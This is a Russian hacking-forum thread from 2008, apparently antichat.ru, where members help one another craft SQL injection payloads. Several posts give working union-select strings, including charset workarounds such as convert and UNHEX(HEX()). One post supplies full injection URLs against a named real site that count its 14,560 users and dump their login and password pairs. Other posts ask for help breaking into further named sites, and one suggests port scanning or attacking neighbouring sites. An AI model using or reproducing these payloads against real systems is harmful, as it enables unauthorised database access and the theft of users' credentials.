Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    j0ker13

    -1+union+select+convert(concat_ws(0x3a,version(),user(),database())+using+latin1)/*

    вот так должно прокатить )
     
    #3281 ~!DoK_tOR!~, 19 Sep 2008
    Last edited: 19 Sep 2008
  2. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    значит пропатчен )

    на дату бага посмотри 2007-02-24
     
  3. Дюша

    Дюша Banned

    Joined:
    9 Dec 2007
    Messages:
    160
    Likes Received:
    77
    Reputations:
    -13
    http://www.vkavkaz.tu2.ru/
    чеза говнофейк :D

    Регистрация:
    Внимание перед регистрацией вам надо авторезироваться:
    В целях безопасности ваших данных, для успешного авторезирования на нашем сайте, вам нужно вести E-MAIL почтового ящика, и его пароль!
     
  4. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2~!DoK_tOR!~ неа)) convert может тока один столбик кодировать или можна сделать так -1+union+select+convert(1,2,3,4,5,6,7+using+latin1)/* или нада каждый конвертировать?))
     
  5. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    j0ker13

    линк дай
     
  6. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    =) ушло тебе;))
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Я только не пойму, если ошибка:
    Зачем конвертировать в latin1 ?

    j0ker13

    Вот так будет работать:
    convert(concat_ws(0x3a,User(),Database(),Version())+using+cp1251)

    если вам нравится с конверт заморачиваться, а вообще

    UNHEX(HEX(concat_ws(0x3a,User(),Database(),Version())))

    универсально
     
    #3287 Kakoytoxaker, 19 Sep 2008
    Last edited: 19 Sep 2008
    1 person likes this.
  8. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    jokester дык это понятна на счет Hex() а почему он ругается именно на Union?) кодировка же нужна тока при выводе колонки а не самой команде))
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    j0ker13
    Учи английский :)
    А если нужен практический пример то в соседнем топике лежит инъекция:
    https://forum.antichat.ru/showpost.php?p=870637&postcount=6661

    Попробуй её без конверта , и увидишь такую-же ошибку
     
  10. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2jokester ладна) по идее это правильно?) -1+union+select+convert(1,2,3,4,5,6,7,8,9,0,1,2+using+cp1251) но выдает ошибку ; check the manual that corresponds to your MySQL server version for the right syntax to use near '2,3,4,5,6,7,8,9,0,1,2 using cp1251)/* ORDER BY date DESC LIMIT 0
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Киньте линк, что-то гадание на кофейной гуще какое-то.
     
    #3291 Kakoytoxaker, 19 Sep 2008
    Last edited: 19 Sep 2008
  12. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    http://mp3db.ru/index.php?cid=9&subcid=-1+union+select+convert(1,2,3,4,5,6,7,8,9,0,1,2+using+utf8)/*
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,concat_ws(0x3a,User(),Database(),Version()),6,null,null,null,null,null,null/*

    http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,count(*),6,null,null,null,null,null,null+from+users/*
    14560 юзеров

    юзеры
    http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,concat_ws(0x3a,login,passwd),6,null,null,null,null,null,null+from+users/*

    Выводятся все так что юзай лимит :))
     
    #3293 Kakoytoxaker, 19 Sep 2008
    Last edited: 19 Sep 2008
  14. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2jokester гг) спс) уже нашел эту базу)) еще вопрос) еси при лоад_файл не показывает ошибки и в принтабельном столбце пусто то однозначно нет файл_прив?)
     
    #3294 j0ker13, 19 Sep 2008
    Last edited: 19 Sep 2008
  15. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Помогите с PostgreSQL столбцы подобрал (54)
     
  16. KHR3b

    KHR3b New Member

    Joined:
    19 Sep 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    народ, помогите плиз с этим: http://ashdoda.net/modules.php?name=Photo_Albums&file=show_photo&photo_id=%2724616
    чо только не пытался, без результатов...
     
  17. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Если phpBB 3,0,1 Пропаченый где взять инфу про его баги и уязвимости?
     
  18. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    geforce, скачать исходники форума, поставить патчи и попробовать разобрать сорцы. Или, как вариант, подождать новую версию и в логах посмотреть какие ошибки исправили, может что и всплывет.
    Если не терпеться можешь порты просканить и узнать, что на них висит - вдруг бажное попадется или "соседний" сайт попытаться ломануть.
    Дюша и Devoldini, это так будет
    cmd -> cd с:\perl\bin\; perl.exe 1.pl
    Хотя у меня когда Винда стояла, хватало команды perl 1.pl и всё запускалось :)
     
  19. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Так что с этим ничего нельзя сделать ? :(
     
  20. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    почитай http://www.xakep.ru/magazine/xA/086/060/1.asp
     
Thread Status:
Not open for further replies.